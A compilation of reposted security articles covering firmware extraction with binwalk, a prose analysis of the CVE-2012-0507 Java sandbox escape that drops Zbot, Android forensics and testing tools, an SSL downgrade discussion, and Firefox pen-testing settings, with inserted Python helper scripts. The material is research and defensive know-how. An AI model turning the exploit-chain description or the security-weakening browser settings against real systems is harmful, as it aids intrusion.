Ah! SquashFS is a very common embedded file system. Although binwalk has several SquashFS signatures, it is not uncommon to find variations of the ‘sqsh’ magic string (which indicates the beginning of a SquashFS image), so what we may be looking for here is a non-standard SquashFS signature inside the firmware file.

So how do we find an unknown signature inside a 4MB binary file? Different sections inside of firmware images are often aligned to a certain size. This often means that there will have to be some padding between sections, as the size of each section will almost certainly not fall exactly on this alignment boundary. An easy way to find these padded sections is to search for lines in our hexdump output that start with an asterisk (‘*’). When hexdump sees the same bytes repeated many times, it simply replaces those bytes with an asterisk to indicate that the last line was repeated many times.

A good place to start looking for a file system inside a firmware image is immediately after these padded sections of data, as the start of the file system will likely need to fall on one of these aligned boundaries.

There are a couple of interesting sections that contain the string ‘sErCoMm’. This could be something, but given the small size of some of these sections and the fact that they don’t appear to have anything to do with SquashFS, it is unlikely:

There are some other sections as well, but again, these are very small, much too small to be a file system:

Then we come across this section, which has the string ‘sqlz’:

The standard SquashFS image starts with ‘sqsh’, but we’ve already seen that the firmware developers have used LZMA compression elsewhere in this image. Also, most firmware that uses SquashFS tends to use LZMA compression instead of the standard zlib compression. So this signature could be a modified SquashFS signature that is a concatenation of ‘sq’ (SQuashfs) and ‘lz’ (LZma). Let’s extract it with dd and take a look:

Of course, ‘sqlz’ is not a standard signature, so the file utility still doesn’t recognize our extracted data. Let’s try editing the ‘sqlz’ string to read ‘sqsh’:

Running file against our modified SquashFS image gives us much better results:

This definitely looks like a valid SquashFS image! But due to the LZMA compression and the older SquashFS version (2.1), you won’t be able to extract any files from it using the standard SquashFS tools. However, using the unsquashfs-2.1 utility included in Jeremy Collake’s firmware mod kit works perfectly:

Now that we know this works, we should go ahead and add this new signature to binwalk so that it will identify the ‘sqlz’ magic string in the future. Adding this new signature is as easy as opening binwalk’s magic file (/etc/binwalk/magic), copy/pasting the ‘sqsh’ signature and changing the ‘sqsh’ to ‘sqlz’:

Re-running binwalk against the original firmware image, we see that it now correctly identifies the SquashFS entry:

And there you have it. We successfully identified and extracted the boot loader, kernel and file system from this firmware image, plus we have a new SquashFS signature to boot!

Source: Reverse Engineering Firmware: Linksys WAG120N | /dev/ttyS0
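The walkthrough above relies on a magic-string search and on binwalk's (then noisy) signatures. The script below is an added example, not the post's own code and not part of binwalk: it scans a blob for uImage headers, accepts a candidate only if the header CRC and the data CRC both verify (which is how a chance 0x27051956 match is told apart from a real U-Boot image), and looks for the standard SquashFS magics together with the vendor-modified 'sqlz' seen in this firmware, rewriting it to 'sqsh' so the stock tools will recognise the superblock. The sample image it runs on is constructed in-line; the load/entry addresses and payloads are stand-ins, not the WAG120N's.

```python
"""Scan a firmware image for uImage headers and SquashFS magics (added example)."""
import struct
import zlib

UIMAGE_MAGIC = 0x27051956
UIMAGE_HDR_LEN = 64
UIMAGE_COMP = {0: "none", 1: "gzip", 2: "bzip2", 3: "lzma"}
SQUASHFS_MAGICS = {
    b"sqsh": "squashfs (big-endian)",
    b"hsqs": "squashfs (little-endian)",
    b"sqlz": "squashfs (lzma, modified magic)",   # non-standard magic from the post
}


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def parse_uimage_header(blob, off):
    """Parse the uImage header at `off`; None if no magic or either CRC fails.

    Layout: magic, hcrc, time, size, load, ep, dcrc (7 x u32 big-endian),
    then os, arch, type, comp (4 x u8) and a 32-byte NUL-padded name.
    """
    hdr = blob[off:off + UIMAGE_HDR_LEN]
    if len(hdr) < UIMAGE_HDR_LEN:
        return None
    magic, hcrc, _time, size, load, ep, dcrc, _os, _arch, _type, comp = \
        struct.unpack(">7I4B", hdr[:32])
    if magic != UIMAGE_MAGIC:
        return None
    # The header CRC is computed with the hcrc field itself zeroed.
    if crc32(hdr[:4] + b"\0\0\0\0" + hdr[8:]) != hcrc:
        return None
    data = blob[off + UIMAGE_HDR_LEN:off + UIMAGE_HDR_LEN + size]
    if len(data) != size or crc32(data) != dcrc:
        return None
    name = hdr[32:].split(b"\0", 1)[0].decode("ascii", "replace")
    return {"offset": off, "name": name, "size": size, "load": load,
            "entry": ep, "comp": UIMAGE_COMP.get(comp, "unknown")}


def find_all(blob, needle):
    off = blob.find(needle)
    while off != -1:
        yield off
        off = blob.find(needle, off + 1)


def scan(blob):
    """Sorted (offset, description) pairs: validated uImages and SquashFS magics."""
    hits = []
    for off in find_all(blob, struct.pack(">I", UIMAGE_MAGIC)):
        info = parse_uimage_header(blob, off)
        if info is not None:
            hits.append((off, "uImage '%s' %s %d bytes load=0x%08x"
                         % (info["name"], info["comp"], info["size"], info["load"])))
    for magic, desc in SQUASHFS_MAGICS.items():
        hits.extend((off, desc) for off in find_all(blob, magic))
    return sorted(hits)


def fix_sqlz_magic(blob):
    """Rewrite 'sqlz' to the standard 'sqsh' so file/unsquashfs recognise it."""
    return blob.replace(b"sqlz", b"sqsh")


# --- constructed sample image (stand-in, not the real WAG120N firmware) ----

def make_uimage(name, payload, comp=3):
    """Build header + payload: os=5 (Linux), arch=5 (MIPS), type=2 (kernel)."""
    fields = struct.pack(">7I4B", UIMAGE_MAGIC, 0, 0, len(payload),
                         0x80000000, 0x80000000, crc32(payload), 5, 5, 2, comp)
    hdr = fields + name.encode("ascii").ljust(32, b"\0")
    hdr = hdr[:4] + struct.pack(">I", crc32(hdr)) + hdr[8:]
    return hdr + payload


def pad(img, align=0x100):
    """Pad with 0xff to the next alignment boundary, like the gaps in the hexdump."""
    return img + b"\xff" * (-len(img) % align)


def build_sample():
    lzma_ish = b"\x5d\x00\x00\x80\x00"   # first bytes of an LZMA stream (stand-in)
    img = pad(make_uimage("u-boot image", lzma_ish + b"\0" * 59))
    img = pad(img + make_uimage("MIPS Linux-2.4.31", lzma_ish + b"\0" * 91))
    # A stray magic inside padding: the CRC checks must reject it.
    img = pad(img + struct.pack(">I", UIMAGE_MAGIC))
    return img + b"sqlz" + b"\0" * 60    # start of the modified SquashFS superblock


if __name__ == "__main__":
    sample = build_sample()
    for off, desc in scan(sample):
        print("0x%06x  %s" % (off, desc))
```

On the sample this reports the two uImages at 0x000 and 0x100 and the 'sqlz' superblock at 0x300, and rejects the bare magic at 0x200; on a real image, run `scan()` on the file contents and then carve with dd at the reported offsets.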
-
binwalk Firmware Analysis Tool

[h=1]About[/h]
Binwalk is a tool for searching a given binary image for embedded files and executable code. Specifically, it is designed for identifying files and code embedded inside of firmware images. Binwalk uses the libmagic library, so it is compatible with magic signatures created for the Unix file utility. Binwalk also includes a custom magic signature file which contains improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, Linux kernels, bootloaders, filesystems, etc.

[h=1]News[/h]
Version 0.4.2 includes significant speed improvements over previous versions, as well as the addition of some new search options (--grep and --raw-bytes).
Version 0.4.0 released. Added support for Linux block devices and building against libmagic rather than the included file utility code. Fixed minor bugs and updated/added signatures.
Version 0.3.9 released. Added build options to disable update features (thus disabling the zlib and libcurl requirements). Added long options. Fixed minor bugs and updated/added signatures.

Download: http://code.google.com/p/binwalk/downloads/list
Source: binwalk - Firmware Analysis Tool - Google Project Hosting
-
Insecure Magazine - RSA Conference. Details inside. Download: http://www.net-security.org/dl/insecure/INSECURE-Mag-RSA2012.pdf
-
[h=3]An interesting case of JRE sandbox breach (CVE-2012-0507)[/h]
msft-mmpc, 20 Mar 2012 2:55 AM

Recently we received a few samples that exploit the latest patched JRE (Java Runtime Environment) vulnerability. These samples are kind of unusual to see, but they can be used to develop highly reliable exploits.

The malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files - one Java class file triggers the vulnerability and the other one is a loader class used for loading. The vulnerability triggering class is actually performing deserialization of an object array and uses a vulnerability in the AtomicReferenceArray to disarm the JRE sandbox mechanism. The attacker deliberately crafted serialized object data. This reference array issue is very serious since the exploit is not a memory corruption issue, but a logical flaw in the handling of the array. So the exploit is highly reliable and that might be one of the reasons why the bad guys picked up this vulnerability for their attacks. We determined this vulnerability to be CVE-2012-0507.

Figure 1: The vulnerability triggering class

The loader class is called from the vulnerability triggering class. This loader class can load additional classes in an escalated privilege context and perform any operations escaping the sandbox mechanism. This loader class creates a new class on the fly and uses it to do malicious jobs with escalated privileges. The 3rd class that is loaded by the loader class downloads a malicious file and decodes it using a simple XOR algorithm. It saves it into a local temporary folder and executes the file using Runtime's exec method. The decoded malicious file is detected as PWS:Win32/Zbot.gen!Y. The following diagram shows the overall process of exploitation.

A.class is the vulnerability triggering class, B.class is the loading class and C.class is the 3rd class that downloads, decodes and executes a malicious binary.

Figure 2: The overall view of exploitation

The following code shows the actual decoding code inside the C.class file. The routine is using a very simple form of XOR decoding.

Figure 3: Decoding routine inside C.class file

Example SHA1s:
fc1ab8bf716a5b3450701ca4b2545888a25398c9 (detected as Exploit:Java/CVE-2012-0507.A)
03e26e735b2f33b3b212bea5b27cbefb2af4ed34 (detected as Exploit:Java/CVE-2012-0507.

The good news is that the vendor has provided a patch for this vulnerability since late February. Just make sure you have the latest JRE version installed on your system. Or you can visit this patch update advisory page to see if you require any updates. So please, update your JRE installations and protect yourself.

Jeong Wook (Matt) Oh & Chun Feng

Source: An interesting case of JRE sandbox breach (CVE-2012-0507) - Microsoft Malware Protection Center - Site Home - TechNet Blogs
-
[h=3]Acquisition and Analysis of Volatile Memory from Android Devices[/h]
[h=2]Monday, January 9, 2012[/h]

We are happy to announce that our paper on Android memory forensics has just been published in the Journal of Digital Investigations! This paper covers a number of topics that we believe will be of interest to both practitioners and researchers in the memory forensics field. The two main contributions of the paper are:

- A kernel module that is able to acquire a complete memory capture from Android devices as well as other Linux computers. This module is also unique in that it operates solely within the kernel and does not require userland interaction. This preserves memory much more effectively than other kernel modules, and a complete comparison of the efficiency is given in the paper. The kernel module can also acquire memory over the network, which prevents the investigator from having to save to the phone’s internal storage or SD card.
- Additions to the Volatility memory analysis framework that allow it to analyze Android kernel memory. This allows all of the Linux analysis plugins to be used against Android memory captures.

There is also discussion on the difficulty of performing generic memory analysis of Android devices as well as the differences of the ARM versus Intel architecture, where a majority of previous memory forensics research has been performed.

If you are interested in this research and are going to be at Shmoocon, Joe Sylve (@jtsylve) will be there presenting the memory acquisition module as well as the Volatility capabilities. You can also leave comments on the blog or find us on Twitter.

Download: http://digitalforensicssolutions.com/papers/android-memory-analysis-DI.pdf
Source: Digital Forensics Solutions: New Paper - Acquisition and Analysis of Volatile Memory from Android Devices
-
Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities

A free framework for bug hunters to find vulnerabilities, write proof-of-concept exploits and play in Android.

- Use dynamic analysis on Android applications and devices for quicker security assessments.
- Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices.
- The easy extensions interface allows users to write custom modules and exploits for Mercury.
- Replace custom applications and scripts that perform single tasks with a framework that provides many tools.

Mercury allows you to:

- Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services
- Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see)
- Find information on installed packages with optional search filters to allow for better control
- Built-in commands that can check application attack vectors on installed applications
- Tools to upload and download files between the Android device and computer without using ADB (this means it can be done over the internet as well!)
- Create new modules to exploit your latest finding on Android, and play with those that others have found.

This demonstration shows how you can find and exploit SQL injection in Android applications using Mercury.

Download: http://labs.mwrinfosecurity.com/assets/254/mercury-v1.0.zip
Guide: http://www.reddit.com/tb/r3atb
Source: Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities | The Hacker News (THN)
-
Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit
Nytro replied to LLegoLLaS's topic in Exploituri
Info: http://www.securitybydefault.com/2012/03/exploit-de-joomla-paso-paso.html -
[h=1]VIDEO: How to solve the RSA 2012 #sophospuzzle[/h]
by Paul Ducklin on March 20, 2012 | Comments (2) Filed Under: Featured, Video

Here is a video showing you how to solve the RSA 2012 crypto puzzle which featured on our conference T-shirts at this year's RSA hootenanny in San Francisco.

We've awarded one NERF gun prize to the first finisher, @trapflag, and a second to Robert Miller, who was randomly chosen (using a hardware random number generator made from coins and playing cards) from the 19 other successful solvers. Winners, please email me to let me know where to send the prizes.

For those of you who didn't finish, here's how to do it:

(Enjoy this video? Check out more on the SophosLabs YouTube channel.)

The second stage of this puzzle involved writing code to perform a cryptographic brute force attack; although there were numerous optimisations you could apply, there were no short cuts. That means that you really had to back yourself that your code was correctly written - so well done to all who took part, and especially to the 20 of you who cracked the puzzle in time.

If you enjoy this sort of puzzle, watch this space: we intend to run them regularly. You might also enjoy watching or trying previous #sophospuzzles!

Source: VIDEO: How to solve the RSA 2012 #sophospuzzle | Naked Security
-
[h=3]SSL optimization and security talk[/h]
Filed under: Crypto, Network, Protocols, Security — Nate Lawson @ 6:12 am

I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention.

False Start provides a minor improvement over stock SSL, which takes two round trips in the initial handshake before application data can be sent. It saves one round trip on the initial handshake at the cost of sending data before checking for someone modifying the server’s handshake messages. It doesn’t provide any benefit on subsequent connections since the stock SSL resume protocol only takes one round trip also.

The False Start designers were aware of this risk, so they suggested the client whitelist ciphersuites for use with False Start. The assumption is that an attacker could get the client to provide ciphertext but wouldn’t be able to decrypt it if the encryption was secure. This is true most of the time, but is not sufficient.

The BEAST attack is a good example where ciphersuite whitelists are not enough. If a client used False Start as described in the standard, it couldn’t detect an attacker spoofing the server version in a downgrade attack. Thus, even if both the client and server supported TLS 1.1, which is secure against BEAST, False Start would have made the client insecure. Stock SSL would detect the version downgrade attack before sending any data and thus be safe.

The False Start standard (or at least implementations) could be modified to only allow False Start if the TLS version is 1.1 or higher. But this wouldn’t prevent downgrade attacks against TLS 1.1 or newer versions. You can’t both be proactively secure against the next protocol attack and use False Start. This may be a reasonable tradeoff, but it does make me a bit uncomfortable.

Snap Start removes both round trips for subsequent connections to the same server. This is one better than stock SSL session resumption. Additionally, it allows rekeying whereas session resumption uses the same shared key. The security cost is that Snap Start removes the server’s random contribution.

SSL is designed to fail safe. For example, neither party solely determines the nonce. Instead, the nonce is derived from both client and server randomness. This way, poor PRNG seeding by one of the participants doesn’t affect the final output. Snap Start lets the client determine the entire nonce, and the server is expected to check it against a cache to prevent replay. There are measures to limit the size of the cache, but a cache can’t tell you how good the entropy is. Therefore, the nonce may be unique but still predictable. Is this a problem? Probably not, but I haven’t analyzed how a predictable nonce affects all the various operating modes of SSL (e.g., ECDH, client cert auth, SRP auth, etc.)

The key insight between both of these proposed changes to SSL is that latency is an important issue to SSL adoption, even with session resumption being built in from the beginning. Also, Google is willing to shift the responsibility for SSL security towards the client in order to save on latency. This makes sense when you own a client and your security deployment model is to ship frequent client updates. It’s less clear that this tradeoff is worth it for SSL applications besides HTTP or other security models.

I appreciate the work people like Adam have been doing to improve SSL performance and security. Obviously, unprotected HTTP is worse than some reductions in SSL security. However, careful study is needed for the many users of these kinds of protocol changes before their full impact is known. I remain cautious about adopting them.

Source: SSL optimization and security talk
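The downgrade argument in the post is about ordering: the Finished messages cover the whole handshake transcript, so a rewritten ServerHello is caught when Finished is verified, and the only question is whether application data has already left the client by then. The toy model below is an added example, not from the talk or the post, and its cryptography is a stand-in (both Finished messages are an HMAC over the transcript under a fixed key that stands for the key-exchange result; there is no record layer). It runs the same downgrade against a stock client, a False Start client with only the ciphersuite whitelist, and one that also requires TLS 1.1, including the case the post raises where the version gate does not help: a downgrade from a newer version to 1.1. The request, suite name and version strings are constructed for the example.

```python
"""Toy SSL handshake showing when False Start data leaves the client (added example)."""
import hashlib
import hmac

SHARED_KEY = b"stand-in for the key-exchange result"
REQUEST = b"GET /account HTTP/1.1\r\nCookie: session=constructed\r\n\r\n"
FALSE_START_SUITES = {"ECDHE-RSA-AES128-SHA"}   # client-side whitelist (constructed)


def finished_mac(transcript):
    """Finished = MAC over every handshake message this side has seen (toy form)."""
    return hmac.new(SHARED_KEY, b"\n".join(transcript), hashlib.sha256).digest()


def vtuple(version):
    return tuple(int(x) for x in version.split("."))


def whitelist_only(version, suite):
    """False Start policy as described: any whitelisted suite."""
    return suite in FALSE_START_SUITES


def whitelist_and_tls11(version, suite):
    """Stricter variant: whitelisted suite and negotiated version >= 1.1."""
    return suite in FALSE_START_SUITES and vtuple(version) >= (1, 1)


def handshake(client_max, server_pick, suite, policy=None, mitm_rewrite=None):
    """Run one toy handshake.

    `policy` is None for a stock client, else a function deciding whether the
    client may False Start given the version and suite it saw. If
    `mitm_rewrite` is set, an attacker replaces the version in ServerHello on
    its way to the client. Returns the bytes of application data the client
    sent before any server message was verified, whether the tampering was
    detected, and the version the client believed it negotiated.
    """
    client_view = [b"ClientHello max=" + client_max.encode()]
    server_view = list(client_view)
    seen = server_pick if mitm_rewrite is None else mitm_rewrite
    server_view.append(b"ServerHello ver=%s suite=%s" % (server_pick.encode(), suite.encode()))
    client_view.append(b"ServerHello ver=%s suite=%s" % (seen.encode(), suite.encode()))
    for msg in (b"ClientKeyExchange", b"ChangeCipherSpec"):
        client_view.append(msg)
        server_view.append(msg)

    client_fin = finished_mac(client_view)
    sent_early = 0
    if policy is not None and policy(seen, suite):
        # False Start: the request goes out right behind the client's Finished,
        # under keys for the version the client *thinks* it negotiated, before
        # anything from the server has been checked.
        sent_early = len(REQUEST)

    # The server verifies the client's Finished against its own transcript; a
    # rewritten ServerHello shows up here as a mismatch and the handshake is
    # aborted, which is too late for data already on the wire.
    if not hmac.compare_digest(client_fin, finished_mac(server_view)):
        return {"sent_before_check": sent_early, "detected": True, "version": seen}
    # Transcripts agree: the client checks the server's Finished, and a stock
    # client only now sends the request it was holding back.
    server_fin = finished_mac(server_view + [client_fin])
    if not hmac.compare_digest(server_fin, finished_mac(client_view + [client_fin])):
        return {"sent_before_check": sent_early, "detected": True, "version": seen}
    return {"sent_before_check": sent_early, "detected": False, "version": seen}


if __name__ == "__main__":
    suite = "ECDHE-RSA-AES128-SHA"
    for label, policy, cmax, spick, mitm in (
            ("stock client, 1.1 -> 1.0", None, "1.1", "1.1", "1.0"),
            ("whitelist only, 1.1 -> 1.0", whitelist_only, "1.1", "1.1", "1.0"),
            ("whitelist + TLS>=1.1, 1.1 -> 1.0", whitelist_and_tls11, "1.1", "1.1", "1.0"),
            ("whitelist + TLS>=1.1, 1.2 -> 1.1", whitelist_and_tls11, "1.2", "1.2", "1.1")):
        print(label, handshake(cmax, spick, suite, policy, mitm))
```

Every run reports the downgrade as detected; the difference is the `sent_before_check` count, which is zero for the stock client and for the gated client at 1.0, and a full request for the whitelist-only client and for the gated client downgraded from 1.2 to 1.1.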
-
[h=3]Configuring Firefox For Web App Pen Testing[/h]
[h=2]15 March 2012[/h]

You know the routine: you get a gig doing a web app pen test. You break out Burp (or whatever lesser proxy you prefer), and get ready to ruin some developer's day. And then, just as you get ready to load the target URL and start, this happens:

It's annoying. Your logs are polluted, and if you have to turn them over to the client, the extra noise strips some of the professionalism from your image (as a sidenote: Burp's "only save in-scope items" feature helps quite a lot with this).

Here then, is a quick guide on how to tweak Firefox so that it doesn't spew stupid crap in your web app pen test log files. I may come back and explain the "why" behind some of these later, but for now, just the "how" will have to do.

(Note: some of these settings reduce the security of the browser. My presumption here is that Firefox will only be used for testing, not for general purpose browsing. The settings below reflect that.)

1) Open about:config
2) Disable Safe Browsing
3) Disable Pipelining
4) Disable Pre-fetching
5) Remove all bookmarks
6) Set homepage to about:blank for startup
7) Make sure history is enabled, but disable search suggestions
8) Disable checking for updates
9) Just say no to helping developers
10) Disable updates for sync

That's it. Now you can go forth, and break all the things, knowing that your log files will be nice and tidy afterwards.

Posted by Jason Ross at 14:04

Source: cruft: Configuring Firefox For Web App Pen Testing
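The post shows the about:config changes as screenshots. The script below is an added example, not the post's own, that writes the same changes as a user.js for a dedicated testing profile so they are applied on every start and can be diffed and reviewed. The preference names are an assumption: they are the names these options had in Firefox of that era, and any that no longer exist on your version are silently ignored, so check them in about:config after starting the profile. Step 5 (bookmarks) is not a preference and still has to be done by hand, and step 10 (Sync updates) is left out because its preference name is not given on the page.

```python
"""Generate a user.js for a Firefox web-app testing profile (added example)."""
import os
import re

# Preference names are assumed from the Firefox of the post's era; verify in about:config.
PENTEST_PREFS = {
    # 2) Safe Browsing lookups (these phone home and pollute proxy logs)
    "browser.safebrowsing.enabled": False,
    "browser.safebrowsing.malware.enabled": False,
    # 3) pipelining (keeps requests one-per-connection, easier to read in a proxy)
    "network.http.pipelining": False,
    "network.http.proxy.pipelining": False,
    # 4) link and DNS pre-fetching
    "network.prefetch-next": False,
    "network.dns.disablePrefetch": True,
    # 6) blank start page
    "browser.startup.homepage": "about:blank",
    "browser.startup.page": 0,
    # 7) keep history, drop search suggestions
    "places.history.enabled": True,
    "browser.search.suggest.enabled": False,
    # 8) no update checks for the browser, extensions or search plugins
    "app.update.enabled": False,
    "app.update.auto": False,
    "extensions.update.enabled": False,
    "browser.search.update": False,
    # 9) "help developers" = telemetry
    "toolkit.telemetry.enabled": False,
}


def js_literal(value):
    """Render a Python value as the literal user.js expects (bool, int or string)."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    return '"%s"' % value.replace("\\", "\\\\").replace('"', '\\"')


def render_user_js(prefs=PENTEST_PREFS):
    """Return user.js text: one user_pref("name", value); line per preference."""
    lines = ["// generated for a web-app testing profile only; not for daily browsing"]
    for name, value in sorted(prefs.items()):
        lines.append('user_pref("%s", %s);' % (name, js_literal(value)))
    return "\n".join(lines) + "\n"


def parse_user_js(text):
    """Read user_pref lines back, enough to verify what was written."""
    out = {}
    for m in re.finditer(r'^user_pref\("([^"]+)",\s*(.+)\);\s*$', text, re.M):
        name, raw = m.group(1), m.group(2)
        if raw in ("true", "false"):
            out[name] = raw == "true"
        elif raw.startswith('"'):
            out[name] = raw[1:-1]
        else:
            out[name] = int(raw)
    return out


def write_user_js(profile_dir, prefs=PENTEST_PREFS):
    """Write user.js into a profile directory (close Firefox first; it rewrites prefs.js on exit)."""
    path = os.path.join(profile_dir, "user.js")
    with open(path, "w") as f:
        f.write(render_user_js(prefs))
    return path


if __name__ == "__main__":
    print(render_user_js(), end="")
```

Create the profile with `firefox -ProfileManager`, point `write_user_js()` at its directory, and keep that profile for testing only; the generated file is a plain list you can hand to a colleague or keep alongside the engagement notes.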